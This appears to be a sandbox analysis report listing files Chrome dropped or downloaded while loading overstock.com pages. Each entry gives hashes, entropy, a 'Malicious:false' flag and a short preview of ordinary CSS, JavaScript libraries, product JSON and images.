                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69
                                                                                                                                                                                    Entropy (8bit):4.087898688625098
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YUzIwCfroKH9cSLJfRiI2HLCf6n:YUzjCfroK24tRt2rCf6
                                                                                                                                                                                    MD5:2D964E8A700809EC78091E2C67F65CF9
                                                                                                                                                                                    SHA1:D7F3081BEE6E506DF8469C68B8F92575CA43EB74
                                                                                                                                                                                    SHA-256:B86851FE85765C4D90E9AF04BDD726F9F58002A0130E81F907B65DC88A25218F
                                                                                                                                                                                    SHA-512:F3B804985AE1DFF0D3419ED4ADF2BD72632E0DFE3BBE728FE7AF6CCC0E71EB02BF5585AB431A80CC4F42B3B054D48B19F90884737B8CF78EE89E96A5A0D8B36A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"qrCode":{"enabled":false},"mobileDownloadBanner":{"enabled":false}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61482
                                                                                                                                                                                    Entropy (8bit):5.508146171238403
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIY:uYW2Pj5yO7t2ACRg8398vh
                                                                                                                                                                                    MD5:09FEC95508BB6201576D3B8FF8E19C37
                                                                                                                                                                                    SHA1:B8CD97960B326E41229792E1A0C92B39CBDAD4B8
                                                                                                                                                                                    SHA-256:948E757FEC2870BC5B65F95AE4637636DA5FB20A4EA3C20A6AC2CF82FFD240E6
                                                                                                                                                                                    SHA-512:D9647CFD7D12358EB4557B3D65AAFD7E9212C3101700CB923A66E3EA0EC2A23715B4FDE1C3B21142B8B6BEF8E858FB10515C2F127DF573B5BBAE1B284568876F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3435)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3539
                                                                                                                                                                                    Entropy (8bit):5.3101229311937885
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:02/GCaqIaMTiSgnFOCIBdlCNGIDo+/Y9Z79G3YqTrNyIqKe398:02/GVqIaMTiSkFOCIBdlCNGIDo4YIIqB
                                                                                                                                                                                    MD5:FAC650A8F4FBDE8F4A23397AE0DC01A2
                                                                                                                                                                                    SHA1:437332A4D8022DF172D5702E4AA1677AD0B70CA6
                                                                                                                                                                                    SHA-256:433C9A32D4D101E316F625E011F6DCB8BB09DCB43C484165318EB0FE299E0D10
                                                                                                                                                                                    SHA-512:0486743D952488567BA657C9E36701A8F1C8E0B2BA6356F509D0BAC735CB2C98D1394C79C56DEE2937824594EB88BD64E4376C7437D3912B8C4974E96BC2CA79
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/os-write-review.css?v=14610245993518191431730157903
                                                                                                                                                                                    Preview:.p-w-r .pr-btn-fileinput,.p-w-r a{color:#d90023}.p-w-r .pr-btn-fileinput:hover,.p-w-r a:hover{color:#ac1b25}.p-w-r .pr-accessible-btn,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a{background-color:#d90023;border-bottom:0;border-radius:2px;cursor:pointer}#pr-reviewdisplay .p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a{background-color:#252525}.p-w-r .pr-accessible-btn:active,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a:active,.p-w-r .pr-accessible-btn:hover,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a:hover{background-color:#ac1b25;color:#fff}.p-w-r .form-control:focus{box-shadow:0 0 0 2px #252525;border-color:#252525}.p-w-r .pr-btn.active{background-color:#5a5a5a}.p-w-r input:focus+label.pr-btn,.p-w-r input:focus+label.pr-lab
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6628
                                                                                                                                                                                    Entropy (8bit):4.739154030964975
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:5BiQYCZUjJ4UYBxEGiU8ZqglZP4iN8lswXRrkuNzeAJivUMq:5sGUqUeFgBJ9MCQ0vu
                                                                                                                                                                                    MD5:F9606CB9F5ED1FD407BAC730355A6013
                                                                                                                                                                                    SHA1:8069BCD1F16BCD1C807886C87F14CE6B1E635AFC
                                                                                                                                                                                    SHA-256:01B5E4649BE7E134E963A189DE21F3B04DE8D5AEBC3E28B399858FA5025DF322
                                                                                                                                                                                    SHA-512:64F049EE9F85BA47DC18910991DD40EA59F911A4BF0DAB16DC1496CE0A0C58B631951E968C7A1C501F6861CA55559E8E057987F5C7F4E5B1275F6518089D611D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function getCookieValue(key) {. const cookies = document.cookie.split(';'). for (let i = 0; i< cookies.length; i++) {. const cookie = cookies[i].trim(); // localization=IN. if(cookie.startsWith(key + '=')) {. return cookie.substring(key.length + 1). }. }. return false;. }. // Function to generate a new session ID. function generateSessionId() {. const timestamp = Date.now();. const randomString = Math.random().toString(36).substring(2);. const sessionId = `ym_${timestamp}_${randomString}`;. return sessionId;. }. . // Function to get fetch cart details.. function fetchCartData() {. return window.fetch(`${window.location.origin}/cart.js`). .then(res => res.clone().json()). .catch( err => console.log()). }. function sendEvent(data, eventName) {. const urlDetails = {"botId":"x1711463078876","customer":"overstock_production","id":"BcOZghlvRm%2FxDQ%2B5JyfxeLa8DrKFvlDs8l8ARsN2MrA%3D","origin":"r4.cloud.yellow.ai"} .
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (666)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):765
                                                                                                                                                                                    Entropy (8bit):5.2374030942985526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:cVw7a56Vw870qpEqcKVwtWVk2GeubUxvVwy5q1Y5VwRc5q1DlXNCSXHm6nuFe653:pI38vEqcn4V+wxq6qVRYqzqyuR5AxNV8
                                                                                                                                                                                    MD5:4C41A86A547A134F133B9AD79CA8B0F5
                                                                                                                                                                                    SHA1:B0D3E6C717257C82D974F686FD6E1367D17FFB22
                                                                                                                                                                                    SHA-256:669F18FC617D93513D25894FBBA9B00E9B0573E9B52E83F647B296F810E77495
                                                                                                                                                                                    SHA-512:9C4EC77E1EAF7F81A51CDDEA4B8074D6BE4FBD9520BF33927B3F8069242E49B70534464F197C454DC38425C5C6BBF95DCD5E1B7B7BABBD388FE2BE02DBCEBCCA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/os-master.css?v=155069223386330419261730157903
                                                                                                                                                                                    Preview:.aa-Autocomplete{width:100%}#header .aa-Input{border:none}#header .aa-Input::placeholder{color:#626669}.aa-DetachedSearchButtonPlaceholder{color:#626669}#header .aa-SubmitButton{display:flex;align-items:center;justify-content:center;background-color:#ac1b25;padding-left:0;padding-right:0;top:0;right:0;height:100%;cursor:pointer}#header .aa-Label svg{color:rgb(var(--color-background))}#header .aa-ClearButton{background:rgb(var(--color-background));z-index:9;width:47px}.price-sale s{color:#252525!important}.price-sale s:after{transform:rotate(0)!important}.card .card__title a:after{position:absolute;content:"";display:block;height:100%;width:100%;top:0;left:0}./*# sourceMappingURL=/cdn/shop/t/224/assets/os-master.css.map?v=155069223386330419261730157903 */.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):177825
                                                                                                                                                                                    Entropy (8bit):5.328756491015198
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:KB6qADwxsSoCzhesk2mqhGIhvK+WqakIRd56hDMZIQkDbxrMO:KbxAO
                                                                                                                                                                                    MD5:DF356F1B38E8FB0712FCC75483360190
                                                                                                                                                                                    SHA1:6C1D44F1E3CF74A1658CA56A4ED64DBCAC2C8468
                                                                                                                                                                                    SHA-256:C33D4AA5F91687523ACAF9C23B07351FBDC4AE39288F91EEAE4D50C5D0FB4869
                                                                                                                                                                                    SHA-512:016C4532113876B6D9A1AB2059FE8132EDAD4704F7731094BCED18815F948B0FA221E02AAEB4DC7495C342AA171688516DB73DF40303E97B096312805D754B20
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"id":9259088707743,"title":"Mia Oversized Modular Sectional Fabric Sofa","handle":"mia-oversized-modular-sectional-fabric-sofa-38169103","description":"\u003cp\u003eElevate your living space with the oversized modular sofa set, a blend of timeless elegance and contemporary comfort. Our sectional sofas feature a clean design, wider seats, and luxurious padding, providing the perfect retreat for relaxation. Versatile configurations cater to any space, making it the ideal choice for both cozy evenings and entertaining guests. Experience the embodiment of personal comfort with the modular sofa, where every moment is an indulgence in serenity and contentment.\u003c\/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures:\u003c\/strong\u003e\u003c\/p\u003e\n\u003cul\u003e\n \u003cli\u003eClean and classic design with comfortable and wider seats\u003c\/li\u003e\n \u003cli\u003eModular pieces for easy rearrangement to fit any living space\u003c\/li\u003e\n \u003cli\u003eAccommodates both small a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2, hostcomputer=imagery4], progressive, precision 8, 588x460, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):17918
                                                                                                                                                                                    Entropy (8bit):7.726175958463908
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:P1HWhYQtvNG8CtGevb0XahwlE4NRwyZCD76G1uEL4vL0ZKQWgp:dZ0kvbZhw5RkD76EuEL4yWY
                                                                                                                                                                                    MD5:54423824B4C26058C5403FEBE5D905B6
                                                                                                                                                                                    SHA1:313960725F48F42F845FA9126E9DB5B6B7E88DA1
                                                                                                                                                                                    SHA-256:64D7E096AE79A334C47B71BF75B94B2A19A03B1C098F6DFFBB2E68470A6AD5B8
                                                                                                                                                                                    SHA-512:B813EA5ABCD307F6222E6E5AB5503DF1CC7DA259CBA5A21A048E9C65614C765CC59BDDBF5E69617EDFFB08F746B506D4C431E453C6BA6BD9F95AC84BD7B49251
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(...........<.......f...i.......p.......................imagery4............0210....................L.......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........L..................................................................................&..........o....................y.z........R......................|..........Q................................F..H.............................:.G@H..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (34424), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):34424
                                                                                                                                                                                    Entropy (8bit):5.303388949056239
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MRQFGgdLRvUdhxVhFzGPoQ5ZzxtaramUh8QF1N7aBGXoxK73OnBtNj9aDzSOGsY7:xZ1sZdmvBFjSBBWG3/E7frG3
                                                                                                                                                                                    MD5:CC519AE088319BBCDACAEC04285B3188
                                                                                                                                                                                    SHA1:93677FEF402AC29784512AB2D0690771E0A364D4
                                                                                                                                                                                    SHA-256:8CDAD1EBA19303C9AECB34392CCBA17F60FD672CCA22D1537C09BA543F95660D
                                                                                                                                                                                    SHA-512:33959F196AE7EAC1A1E24EC173673A0C33E439A65E5B4CE0DC06B7D258D6E797C869E06178CF1DA8C6839679239255C1DADD7FB7AC819FF259905D533372D2CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/@statsig/js-client@1/build/statsig-js-client.min.js
                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Statsig=e():t.Statsig=e()}(this,()=>(()=>{"use strict";var $Q=(e)=>Object.defineProperty(e,"__esModule",{value:!0});var $Q2=(a,b,c)=>Object.defineProperty(a,b,c);var $P=(a,b)=>Object.assign(a,b);var $A=()=>((t,r,u,l)=>{return new(u=u||Promise)(function(n,e){function i(t){try{s(l.next(t))}catch(t){e(t)}}function o(t){try{s(l.throw(t))}catch(t){e(t)}}function s(t){var e;t.done?n(t.value):((e=t.value)instanceof u?e:new u(function(t){t(e)})).then(i,o)}s((l=l.apply(t,r||[])).next())})});var i={845:(t,i,e)=>{$Q2(i,"__esModule",{value:!0}),i.t=i.i=i.o=void 0,i.o=()=>__STATSIG__||u,i.i=t=>(0,i.o)()[t];i.t=t=>{var e=(0,i.o)();return t?e.instances&&e.instances[t]:e.lastInstance};var n,s="__STATSIG__",r="undefined"!=typeof window?window:{},e=void 0!==e.g?e.g:{},o="undefined"!=typeof globalThis?globalThis:{};const u=null!=(n=null!=(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):373
                                                                                                                                                                                    Entropy (8bit):5.249933256396432
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YYriyauoXCe90ZdwDqsrVGdewoBVwoBBCLbiBbV9I4ebCmIA4XiYHj1w5k6BCLc4:YuiyuyW0PwDqsrVGdewSwGI/b7YJw5l4
                                                                                                                                                                                    MD5:118BA6AD3B87F6F7F856C4ED27193475
                                                                                                                                                                                    SHA1:985FC80CD18B694A1D73E21E87C665D461B7B8C9
                                                                                                                                                                                    SHA-256:79CA1F15F428E62603FB8B4EEB4908D53286AB673945A105CE7A3319EF1E108E
                                                                                                                                                                                    SHA-512:538644118B492F320293C77FFF76F97158F90E2C7A3A6E0004630343B9FB59F8BFA09D3D0AD6ED645B82473ED98363E293EE58B957A8D80ADF0AFF8E1FED5719
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"token":"Z2NwLXVzLWNlbnRyYWwxOjAxSkJFU0VaUFkxODdFRlo0VFBLMlRFR0FR?key=840dbf61484c6e9439706f0c9300fee3","note":"","attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[],"items_changelog":{"added":[]}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4904)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5000
                                                                                                                                                                                    Entropy (8bit):4.976386820261073
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:CCOQXX1GWGl/zfwZrDXy87PKCbZ6C0RckY4CibyBvn8:CCOQXX1GWGl/zfwZPXy87P1Zx0RPY4j/
                                                                                                                                                                                    MD5:BE7F94CF347AE5DF692053AD232AD293
                                                                                                                                                                                    SHA1:DE15D83F538E9BBB52608C09FA06D91BA644C02B
                                                                                                                                                                                    SHA-256:6C08DAD503C9BCF14892003F27DBA60C8ACA45E7CBFBD2BB0BB6FA7ED849E510
                                                                                                                                                                                    SHA-512:252A0A58022ABEEA067FE9BF56448C0775FAC055F9FAFB9E47DE5D81DD9687160FC1D9182A929F1FC9E6DE29669AEE615776D1D3B914E270E0E26233D1082000
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/footer.css?v=109542107773651875661730157903
                                                                                                                                                                                    Preview:.footer{padding:calc(2 * var(--space-unit)) 0 calc(10 * var(--space-unit))}.back-to-top+.footer{border-top:0}.footer a:not(.btn){transition:-webkit-text-decoration .2s ease-out;transition:text-decoration .2s ease-out;transition:text-decoration .2s ease-out,-webkit-text-decoration .2s ease-out;color:currentColor;-webkit-text-decoration:underline transparent 1px;text-decoration:underline transparent 1px;text-underline-offset:.25rem}.footer a:not(.btn):hover{text-decoration-color:currentColor}.footer .input-with-button{box-shadow:inset 0 0 0 var(--input-border-width) rgba(var(--text-color)/.2)}.footer .input-with-button:focus-within{box-shadow:inset 0 0 0 var(--input-border-width) currentColor}.footer .input-with-button>.btn{border:0}.footer .media{display:inline-block}.footer .social{display:inline-flex}.footer__main>.footer-col:first-child .disclosure{border-top:0}.footer-block+.footer-block{margin-top:calc(12 * var(--space-unit))}.footer-block__btns,.footer-col--newsletter .input-with-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 640x238, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12390
                                                                                                                                                                                    Entropy (8bit):7.93206902780831
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:lMKAnb741pQzDQjJgElwew8L7r5iJ8YxZMSH:q74tj+ElwePDkhx+SH
                                                                                                                                                                                    MD5:300A46CCC08FCBB7A1ECC2C13688AB43
                                                                                                                                                                                    SHA1:DDCED1ADDA502206964CA0FF7C6F9964D4F07A7D
                                                                                                                                                                                    SHA-256:9B66320099F06DDAE20375394E812249E98AA26425D59D0B0B6E53F50912990E
                                                                                                                                                                                    SHA-512:AA5D9A9C8F82FCDD7F3DD86C18CF5F7949648AA942BFAC04AA40E990404CB6BDDF9D54CF2673F7D3281147E134FC15CF56F1CF17CBEBC4CB68DFD80A6356E70E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................$.!.....!.$.7.'.*.'.*.'.7.S.4.=.4.4.=.4.S.J.Y.I.D.I.Y.J...h.\.\.h.......z...................1.1..................................$.!.....!.$.7.'.*.'.*.'.7.S.4.=.4.4.=.4.S.J.Y.I.D.I.Y.J...h.\.\.h.......z...................1.1............."..........3................................................................;..=*'...6....t..Y....WO..iV..8..RQ(hC..".$0J@......;.......hZ...b.&.M..mYE.D..a./.2.._...y.mM.Z.....D./.f.z.9....h.2....J.f....S...n...1l.z(.s.:9.,.7.z).3*q...EI.d....EHLF.I.KOG1....9}.l..I5J.M..AE......DKO...Ym...Y.D)u..w...$o....4.}.....f.oa|s.yS;E.f..hQ&2.........#....e...4o....2AU.V.l.....$.#....*DJRB....yn.8m....ae6..&...%.n1]M.<.6.'...wo.te..~:g.]...l....5.Ui.....Q5.8../_e.=.<.S......7R$v......]....(..=.Y..]G.L..v.."P.-...1.E.. ..&%).T....u.Y)/O..$."d.1.B.Ee...v{.%...1..4.aF:E0.W.....c.&.]....~.^.......>........q..9..KL.....G...y.M.i..-...l...f]H.N*7.L........#.0I...!...u.=~.{....0..D
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2733
                                                                                                                                                                                    Entropy (8bit):7.222172008946208
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxF5MwUT64d8Tj+Bfafiae/WcfAiQzjNMS+c6KMQ:NBIl/XrxF5kT6QOi2W/tYi4jNT+cZ
                                                                                                                                                                                    MD5:352E6096459640A30EC8E50D65889E03
                                                                                                                                                                                    SHA1:912D3353C38C5723DEB9225BAAA9F98953FC1DA8
                                                                                                                                                                                    SHA-256:1ECB1E0E63CAFB20EB541CA039018A89D94CEE83C804C2838B125F1A782C5F33
                                                                                                                                                                                    SHA-512:90EAA02063DA7643BE9470DC822B8A53DBF22CCB98142E5A36FB1575187CA811A4402C1F137F7D846EE165E3339448E7818084BF0E8534239D0C24AC1B8CDDEF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................y.4...`.<&=...xL..gib...e.z....-...q..%p..=....v.:.J...../^2.._.`....K.......NX..m...=..h....7.L.m...]..B.^..V..MVdf.K1.,.....&
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (20235)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24394
                                                                                                                                                                                    Entropy (8bit):5.512377842344329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:vs/9vNwg8FS7dGJBTCsGg2mB/5FUs6pKLbUxdXtLXaJPPv2GggWGY:uN9DmZlYdS2GggWGY
                                                                                                                                                                                    MD5:17F0A135EB15799FCFFAD2B076BA5A83
                                                                                                                                                                                    SHA1:FA09FE59E00C70EB47B518445F49EA7BE052F49E
                                                                                                                                                                                    SHA-256:2C2376365F9C79B9338182A4973F121D6C13168A497818EE8C0B05948E22BBCF
                                                                                                                                                                                    SHA-512:13FE748AD572F6A0AA42277FE32F15C2D28EAF9D7DBF64ACAC48EA9896C274039D0F52E4A9102035CF09D5BCAE64C364F12D1F65DC171B4DAC30827A306D053B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/vsearch-main.2d4HcZXx.js
                                                                                                                                                                                    Preview:const __vite__fileDeps=window.__vite__fileDeps||[],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(`._overlay_1il33_1{position:fixed;top:0;left:0;width:100%;height:100%;z-index:35;display:block;opacity:1;background-color:#fff}._withSideAnimation_1il33_13{transition:left .3s ease}._open_1il33_17{left:0}._close_1il33_21{left:100%}._facetValueLabel_1n921_1{position:relative;display:block;padding-left:28px;color:#252525;font-size:14px;cursor:pointer}._facetValueLabel_1n921_1 input{position:absolute;opacity:0;height:0;width:0}._facetValueLabel_1n921_1:before{content:"";position:absolute;top:50%;left:0;transform:translateY(-50%);width:20px;height:20px;box-sizing:border-box;border-radius:2px;border:1px solid #5a5a5a}._facetValueLabel_1n921_1._isRadio_1n921_27:before{border-radius:50%}._checked_1n921_31:before{border:none;content:url("data:image/svg+xml,%3csvg%20xm
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):231853
                                                                                                                                                                                    Entropy (8bit):5.560195861074095
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:JqwiztGbETra2oGy0+5CptDY8/I8+R0OBhrDmKD0C8Gp/IBl:sGbg+2oTMaT3x0C8Gp/IH
                                                                                                                                                                                    MD5:ADC8F2EC611C6913DEEF11C42E0226B1
                                                                                                                                                                                    SHA1:58D1305379083DDB5962BE678ADA44AAD04C75B8
                                                                                                                                                                                    SHA-256:A57221F60BD81B211068B6EC0DDECA88907C5907029A307714193F9D70BF9617
                                                                                                                                                                                    SHA-512:E14A5BB6FECDD5A115BD4E2EBA4A46BF552B881C5B9255B8682069A99E7FF3034D90AC9A2DBF2C0F665295FE0D11ED72B40EC7C47EDA24C96E6B69239B3E8F8C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-14698185","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":""
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (20601), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):20601
                                                                                                                                                                                    Entropy (8bit):5.370200684090841
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:bWulPyp98KKsRC1XKgrsfgMwUxx92M2MebrBb+n:bWOqp98KKsRqKEJUv92M2tF+n
                                                                                                                                                                                    MD5:C354318623122F8EE1DE49BA8C188493
                                                                                                                                                                                    SHA1:8854EDF40D0E9FCA66D42FB36703062339ED591D
                                                                                                                                                                                    SHA-256:E7ADBC6081FC896E11FB38F01DDF698FEF14D8105CEC2372B5D84FF61F19421C
                                                                                                                                                                                    SHA-512:D17D0BC3A55558B5368AE094472D2BA2D04C93DCC96C2FC0743FCDF285FB0AE18F92C8516F46286E53F4378A76444CEA5D144AE131AE5FEB4DC0ED7BDEF9D842
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/js/brazesw.2.3.min.js
